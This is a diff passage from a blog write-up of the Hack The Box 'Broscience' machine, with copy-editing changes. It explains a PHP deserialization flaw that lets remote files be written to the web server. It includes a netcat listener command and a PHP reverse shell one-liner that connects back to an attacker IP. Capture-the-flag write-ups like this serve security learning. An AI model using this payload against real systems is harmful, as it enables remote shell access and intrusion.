hanzbzz/hanzbzz.github.io/_posts/2023-04-09-HTB-broscience.md

     }
 }
 ```
 So, what happens when unserialize is called on an `AvatarInterface` object?
-It creates an instance of `Avatar` object, and then calls the `save` method of that object.
+It creates an instance of the `Avatar` object and then calls that object's `save` method.
 This method then reads a file and writes its contents to another file.
 Since `file_get_contents` [can](https://www.php.net/manual/en/function.file-get-contents.php) read remote files and i control the path to this file, i can make it read a file with PHP reverse shell and save it on the webserver!
 The attack looks like this:
 1. Start a netcat listener on port 9999
 ```
 ❯ nc -lvnp 9999
 listening on [any] 9999 ...
 ```
-2. Create the file with reverse shell payload and start a webserver to host it
+2. Create the file with reverse shell payload and start a web server to host it
 ```
 ❯ echo '<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.169 9999 >/tmp/f"); ?>' > payload
 ❯ python3 -m http.server